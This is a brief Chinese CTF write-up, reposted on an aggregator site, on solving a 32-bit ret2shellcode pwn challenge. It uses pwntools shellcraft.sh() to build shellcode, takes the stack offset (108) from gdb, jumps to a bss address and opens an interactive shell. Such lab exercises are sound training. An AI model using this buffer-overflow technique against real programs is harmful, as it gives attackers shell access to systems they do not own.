pwn做题之ret2shellcode
发布时间:2024年01月23日
将二进制文件拖入ida发现无后门程序,想到要生成shellcode,用shellcraft.sh()生成,asm(shellcraft.sh()),用gdb找ebx-eax的值,payload=(ebp-eax)转换成10进制+4(文件为32字节,64字节应为8)+p32(bass区地址).
io.sendline(payload)
io.interactive()
ebp-eax=6c=108
文章来源:https://blog.csdn.net/2303_79500944/article/details/135714760
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:chenni525@qq.com进行投诉反馈,一经查实,立即删除!
最新文章
- Python教程
- 深入理解 MySQL 中的 HAVING 关键字和聚合函数
- Qt之QChar编码(1)
- MyBatis入门基础篇
- 用Python脚本实现FFmpeg批量转换
- AI手写数字识别(二)
- 【3D数据读取】利用JAVA读取GLB(GLTF)文件数据
- 暴雨信息与英特尔联合发布全球首个全液冷冷板服务器参考设计
- 蓝桥备战 每日一题 (1)
- 测试bug分析
- Java 值传递、引用传递
- 基于 Hologres+Flink 的曹操出行实时数仓建设
- cuda以及tensorflow gpu版本安装
- 【JVM】Java虚拟机:如何判定哪些对象可回收?
- 第十一回 梁山泊林冲落草 汴京城杨志卖刀-FreeBSD/Linux 管理用户和组